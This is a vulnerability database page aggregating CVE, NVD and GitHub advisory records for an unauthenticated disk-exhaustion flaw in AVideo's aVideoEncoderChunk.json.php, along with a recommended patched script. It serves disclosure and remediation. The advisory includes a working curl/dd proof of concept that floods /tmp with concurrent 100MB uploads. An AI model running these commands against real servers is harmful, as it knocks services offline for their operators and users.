Vulnerability-Lookup

CVE-2026-33483 (GCVE-0-2026-33483)

Vulnerability from cvelistv5 – Published: 2026-03-23 14:12 – Updated: 2026-03-24 17:42

Title

AVideo Affected by Unauthenticated Disk Space Exhaustion via Unlimited Temp File Creation in aVideoEncoderChunk.json.php

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `aVideoEncoderChunk.json.php` endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in `/tmp/` with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server. Commit 33d1bae6c731ef1682fcdc47b428313be073a5d1 contains a patch.

Severity

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-770 - Allocation of Resources Without Limits or Throttling

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
https://github.com/WWBN/AVideo/commit/33d1bae6c73…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33483",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T17:41:01.773424Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T17:42:00.272Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `aVideoEncoderChunk.json.php` endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in `/tmp/` with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server. Commit 33d1bae6c731ef1682fcdc47b428313be073a5d1 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770: Allocation of Resources Without Limits or Throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T14:12:05.025Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1"
        }
      ],
      "source": {
        "advisory": "GHSA-vv7w-qf5c-734w",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo Affected by Unauthenticated Disk Space Exhaustion via Unlimited Temp File Creation in aVideoEncoderChunk.json.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33483",
    "datePublished": "2026-03-23T14:12:05.025Z",
    "dateReserved": "2026-03-20T16:16:48.970Z",
    "dateUpdated": "2026-03-24T17:42:00.272Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33483",
      "date": "2026-06-01",
      "epss": "0.0061",
      "percentile": "0.70084"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33483\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T15:16:34.717\",\"lastModified\":\"2026-03-24T18:36:55.063\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `aVideoEncoderChunk.json.php` endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in `/tmp/` with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server. Commit 33d1bae6c731ef1682fcdc47b428313be073a5d1 contains a patch.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el endpoint \u0027aVideoEncoderChunk.json.php\u0027 es un script PHP completamente aut\u00f3nomo sin autenticaci\u00f3n, sin inclusiones de framework y sin l\u00edmites de recursos. Un atacante remoto no autenticado puede enviar datos POST arbitrarios que se escriben en archivos temporales persistentes en \u0027/tmp/\u0027 sin l\u00edmite de tama\u00f1o, sin limitaci\u00f3n de velocidad y sin mecanismo de limpieza. Esto permite un agotamiento trivial del espacio en disco lo que lleva a la denegaci\u00f3n de servicio de todo el servidor. El commit 33d1bae6c731ef1682fcdc47b428313be073a5d1 contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33483\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T17:41:01.773424Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T17:41:50.891Z\"}}], \"cna\": {\"title\": \"AVideo Affected by Unauthenticated Disk Space Exhaustion via Unlimited Temp File Creation in aVideoEncoderChunk.json.php\", \"source\": {\"advisory\": \"GHSA-vv7w-qf5c-734w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1\", \"name\": \"https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `aVideoEncoderChunk.json.php` endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in `/tmp/` with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server. Commit 33d1bae6c731ef1682fcdc47b428313be073a5d1 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-23T14:12:05.025Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33483\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T17:42:00.272Z\", \"dateReserved\": \"2026-03-20T16:16:48.970Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-23T14:12:05.025Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33483

Vulnerability from fkie_nvd - Published: 2026-03-23 15:16 - Updated: 2026-03-24 18:36

Severity

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1	Patch
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `aVideoEncoderChunk.json.php` endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in `/tmp/` with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server. Commit 33d1bae6c731ef1682fcdc47b428313be073a5d1 contains a patch."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el endpoint \u0027aVideoEncoderChunk.json.php\u0027 es un script PHP completamente aut\u00f3nomo sin autenticaci\u00f3n, sin inclusiones de framework y sin l\u00edmites de recursos. Un atacante remoto no autenticado puede enviar datos POST arbitrarios que se escriben en archivos temporales persistentes en \u0027/tmp/\u0027 sin l\u00edmite de tama\u00f1o, sin limitaci\u00f3n de velocidad y sin mecanismo de limpieza. Esto permite un agotamiento trivial del espacio en disco lo que lleva a la denegaci\u00f3n de servicio de todo el servidor. El commit 33d1bae6c731ef1682fcdc47b428313be073a5d1 contiene un parche."
    }
  ],
  "id": "CVE-2026-33483",
  "lastModified": "2026-03-24T18:36:55.063",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-23T15:16:34.717",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-VV7W-QF5C-734W

Vulnerability from github – Published: 2026-03-20 20:46 – Updated: 2026-03-25 18:49

Summary

AVideo Affected by Unauthenticated Disk Space Exhaustion via Unlimited Temp File Creation in aVideoEncoderChunk.json.php

Details

Summary

The aVideoEncoderChunk.json.php endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in /tmp/ with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server.

Details

The file objects/aVideoEncoderChunk.json.php (25 lines total) operates entirely outside the AVideo framework:

// objects/aVideoEncoderChunk.json.php — full file
<?php
header('Access-Control-Allow-Origin: *');           // Line 2: CORS wildcard
header('Content-Type: application/json');
$obj = new stdClass();
$obj->file = tempnam(sys_get_temp_dir(), 'YTPChunk_');  // Line 5: creates /tmp/YTPChunk_XXXXXX

$putdata = fopen("php://input", "r");              // Line 7: reads raw POST body
$fp = fopen($obj->file, "w");

while ($data = fread($putdata, 1024 * 1024)) {     // Line 12: 1MB chunks, no limit
    fwrite($fp, $data);
}

fclose($fp);
fclose($putdata);
sleep(1);
$obj->filesize = filesize($obj->file);

$json = json_encode($obj);
die($json);                                         // Line 25: returns {"file":"/tmp/YTPChunk_abc123","filesize":104857600}

The vulnerability chain:

No authentication: The script includes no session handling, no require_once of the framework, no useVideoHashOrLogin(), no canUpload() — nothing. Compare with aVideoEncoder.json.php which includes configuration.php and calls authentication functions.
No size limits: php://input is read until exhaustion. The effective limit is PHP's post_max_size, which AVideo's .htaccess has commented-out settings for 4GB (#php_value post_max_size 4G at line 536). Default AVideo installations recommend at least 100MB.
No cleanup: A grep for YTPChunk_ across the entire codebase returns only the chunk file itself. No cron job, no garbage collection, no consumer that deletes files after processing. The temp files persist until the server is manually cleaned.
Path disclosure: The response JSON includes the full filesystem temp path (e.g., /tmp/YTPChunk_abc123), revealing server directory structure.
CORS wildcard: Access-Control-Allow-Origin: * on line 2 means any malicious webpage can trigger this attack via the visitor's browser, potentially distributing the attack across many source IPs.
Public routing: .htaccess line 437 rewrites /aVideoEncoderChunk.json to this file, making it accessible at a clean URL.

PoC

Step 1: Confirm endpoint is accessible and unauthenticated

curl -s -X POST https://target/aVideoEncoderChunk.json \
  -H 'Content-Type: application/octet-stream' \
  --data-binary 'test'

Expected output:

{"file":"/tmp/YTPChunk_XXXXXX","filesize":4}

Step 2: Write a large temp file (100MB)

dd if=/dev/zero bs=1M count=100 2>/dev/null | \
  curl -s -X POST https://target/aVideoEncoderChunk.json \
  -H 'Content-Type: application/octet-stream' \
  --data-binary @-

Expected output:

{"file":"/tmp/YTPChunk_YYYYYY","filesize":104857600}

Step 3: Parallel disk exhaustion (10 concurrent 100MB requests = 1GB)

for i in $(seq 1 10); do
  dd if=/dev/zero bs=1M count=100 2>/dev/null | \
    curl -s -X POST https://target/aVideoEncoderChunk.json \
    -H 'Content-Type: application/octet-stream' \
    --data-binary @- &
done
wait

Step 4: Verify files persist (they are never cleaned up)

# On the server:
ls -la /tmp/YTPChunk_*
# All files remain indefinitely

Impact

Denial of Service: Filling /tmp/ causes cascading failures — PHP session handling breaks, MySQL temp tables fail, and system services relying on tmpfs crash. This can take down the entire server, not just AVideo.
No authentication barrier: Any anonymous internet user can trigger this attack.
Cross-origin exploitation: The CORS wildcard header allows any malicious website to use visitors' browsers as distributed attack proxies, bypassing IP-based rate limiting at the network level.
Information disclosure: The temp file path in the response reveals the server's filesystem layout.
Persistence: Created files are never cleaned up, so even a brief attack has lasting impact until manual intervention.

Recommended Fix

Replace objects/aVideoEncoderChunk.json.php with a version that includes authentication, size limits, and cleanup:

<?php
if (empty($global)) {
    $global = [];
}
require_once '../videos/configuration.php';

header('Content-Type: application/json');
allowOrigin(); // Use AVideo's configured CORS instead of wildcard

// Require authentication
$userObj = new User(0);
if (!User::canUpload()) {
    http_response_code(403);
    die(json_encode(['error' => true, 'msg' => 'Not authorized']));
}

// Enforce size limit (e.g., 200MB)
$maxSize = 200 * 1024 * 1024;
$contentLength = isset($_SERVER['CONTENT_LENGTH']) ? (int)$_SERVER['CONTENT_LENGTH'] : 0;
if ($contentLength > $maxSize) {
    http_response_code(413);
    die(json_encode(['error' => true, 'msg' => 'Payload too large']));
}

$obj = new stdClass();
$obj->file = tempnam(sys_get_temp_dir(), 'YTPChunk_');

$putdata = fopen("php://input", "r");
$fp = fopen($obj->file, "w");
$written = 0;

while ($data = fread($putdata, 1024 * 1024)) {
    $written += strlen($data);
    if ($written > $maxSize) {
        fclose($fp);
        fclose($putdata);
        unlink($obj->file);
        http_response_code(413);
        die(json_encode(['error' => true, 'msg' => 'Payload too large']));
    }
    fwrite($fp, $data);
}

fclose($fp);
fclose($putdata);

$obj->filesize = filesize($obj->file);
// Do not expose full filesystem path
$obj->file = basename($obj->file);

die(json_encode($obj));

Additionally, add a cleanup cron job or garbage collection to remove YTPChunk_* files older than a configurable timeout (e.g., 1 hour).

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33483"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T20:46:50Z",
    "nvd_published_at": "2026-03-23T15:16:34Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `aVideoEncoderChunk.json.php` endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in `/tmp/` with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server.\n\n## Details\n\nThe file `objects/aVideoEncoderChunk.json.php` (25 lines total) operates entirely outside the AVideo framework:\n\n```php\n// objects/aVideoEncoderChunk.json.php \u2014 full file\n\u003c?php\nheader(\u0027Access-Control-Allow-Origin: *\u0027);           // Line 2: CORS wildcard\nheader(\u0027Content-Type: application/json\u0027);\n$obj = new stdClass();\n$obj-\u003efile = tempnam(sys_get_temp_dir(), \u0027YTPChunk_\u0027);  // Line 5: creates /tmp/YTPChunk_XXXXXX\n\n$putdata = fopen(\"php://input\", \"r\");              // Line 7: reads raw POST body\n$fp = fopen($obj-\u003efile, \"w\");\n\nwhile ($data = fread($putdata, 1024 * 1024)) {     // Line 12: 1MB chunks, no limit\n    fwrite($fp, $data);\n}\n\nfclose($fp);\nfclose($putdata);\nsleep(1);\n$obj-\u003efilesize = filesize($obj-\u003efile);\n\n$json = json_encode($obj);\ndie($json);                                         // Line 25: returns {\"file\":\"/tmp/YTPChunk_abc123\",\"filesize\":104857600}\n```\n\nThe vulnerability chain:\n\n1. **No authentication**: The script includes no session handling, no `require_once` of the framework, no `useVideoHashOrLogin()`, no `canUpload()` \u2014 nothing. Compare with `aVideoEncoder.json.php` which includes `configuration.php` and calls authentication functions.\n\n2. **No size limits**: `php://input` is read until exhaustion. The effective limit is PHP\u0027s `post_max_size`, which AVideo\u0027s `.htaccess` has commented-out settings for 4GB (`#php_value post_max_size 4G` at line 536). Default AVideo installations recommend at least 100MB.\n\n3. **No cleanup**: A grep for `YTPChunk_` across the entire codebase returns only the chunk file itself. No cron job, no garbage collection, no consumer that deletes files after processing. The temp files persist until the server is manually cleaned.\n\n4. **Path disclosure**: The response JSON includes the full filesystem temp path (e.g., `/tmp/YTPChunk_abc123`), revealing server directory structure.\n\n5. **CORS wildcard**: `Access-Control-Allow-Origin: *` on line 2 means any malicious webpage can trigger this attack via the visitor\u0027s browser, potentially distributing the attack across many source IPs.\n\n6. **Public routing**: `.htaccess` line 437 rewrites `/aVideoEncoderChunk.json` to this file, making it accessible at a clean URL.\n\n## PoC\n\n**Step 1: Confirm endpoint is accessible and unauthenticated**\n```bash\ncurl -s -X POST https://target/aVideoEncoderChunk.json \\\n  -H \u0027Content-Type: application/octet-stream\u0027 \\\n  --data-binary \u0027test\u0027\n```\nExpected output:\n```json\n{\"file\":\"/tmp/YTPChunk_XXXXXX\",\"filesize\":4}\n```\n\n**Step 2: Write a large temp file (100MB)**\n```bash\ndd if=/dev/zero bs=1M count=100 2\u003e/dev/null | \\\n  curl -s -X POST https://target/aVideoEncoderChunk.json \\\n  -H \u0027Content-Type: application/octet-stream\u0027 \\\n  --data-binary @-\n```\nExpected output:\n```json\n{\"file\":\"/tmp/YTPChunk_YYYYYY\",\"filesize\":104857600}\n```\n\n**Step 3: Parallel disk exhaustion (10 concurrent 100MB requests = 1GB)**\n```bash\nfor i in $(seq 1 10); do\n  dd if=/dev/zero bs=1M count=100 2\u003e/dev/null | \\\n    curl -s -X POST https://target/aVideoEncoderChunk.json \\\n    -H \u0027Content-Type: application/octet-stream\u0027 \\\n    --data-binary @- \u0026\ndone\nwait\n```\n\n**Step 4: Verify files persist (they are never cleaned up)**\n```bash\n# On the server:\nls -la /tmp/YTPChunk_*\n# All files remain indefinitely\n```\n\n## Impact\n\n- **Denial of Service**: Filling `/tmp/` causes cascading failures \u2014 PHP session handling breaks, MySQL temp tables fail, and system services relying on tmpfs crash. This can take down the entire server, not just AVideo.\n- **No authentication barrier**: Any anonymous internet user can trigger this attack.\n- **Cross-origin exploitation**: The CORS wildcard header allows any malicious website to use visitors\u0027 browsers as distributed attack proxies, bypassing IP-based rate limiting at the network level.\n- **Information disclosure**: The temp file path in the response reveals the server\u0027s filesystem layout.\n- **Persistence**: Created files are never cleaned up, so even a brief attack has lasting impact until manual intervention.\n\n## Recommended Fix\n\nReplace `objects/aVideoEncoderChunk.json.php` with a version that includes authentication, size limits, and cleanup:\n\n```php\n\u003c?php\nif (empty($global)) {\n    $global = [];\n}\nrequire_once \u0027../videos/configuration.php\u0027;\n\nheader(\u0027Content-Type: application/json\u0027);\nallowOrigin(); // Use AVideo\u0027s configured CORS instead of wildcard\n\n// Require authentication\n$userObj = new User(0);\nif (!User::canUpload()) {\n    http_response_code(403);\n    die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Not authorized\u0027]));\n}\n\n// Enforce size limit (e.g., 200MB)\n$maxSize = 200 * 1024 * 1024;\n$contentLength = isset($_SERVER[\u0027CONTENT_LENGTH\u0027]) ? (int)$_SERVER[\u0027CONTENT_LENGTH\u0027] : 0;\nif ($contentLength \u003e $maxSize) {\n    http_response_code(413);\n    die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Payload too large\u0027]));\n}\n\n$obj = new stdClass();\n$obj-\u003efile = tempnam(sys_get_temp_dir(), \u0027YTPChunk_\u0027);\n\n$putdata = fopen(\"php://input\", \"r\");\n$fp = fopen($obj-\u003efile, \"w\");\n$written = 0;\n\nwhile ($data = fread($putdata, 1024 * 1024)) {\n    $written += strlen($data);\n    if ($written \u003e $maxSize) {\n        fclose($fp);\n        fclose($putdata);\n        unlink($obj-\u003efile);\n        http_response_code(413);\n        die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Payload too large\u0027]));\n    }\n    fwrite($fp, $data);\n}\n\nfclose($fp);\nfclose($putdata);\n\n$obj-\u003efilesize = filesize($obj-\u003efile);\n// Do not expose full filesystem path\n$obj-\u003efile = basename($obj-\u003efile);\n\ndie(json_encode($obj));\n```\n\nAdditionally, add a cleanup cron job or garbage collection to remove `YTPChunk_*` files older than a configurable timeout (e.g., 1 hour).",
  "id": "GHSA-vv7w-qf5c-734w",
  "modified": "2026-03-25T18:49:45Z",
  "published": "2026-03-20T20:46:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33483"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo Affected by Unauthenticated Disk Space Exhaustion via Unlimited Temp File Creation in aVideoEncoderChunk.json.php"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33483 (GCVE-0-2026-33483)

FKIE_CVE-2026-33483

GHSA-VV7W-QF5C-734W

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature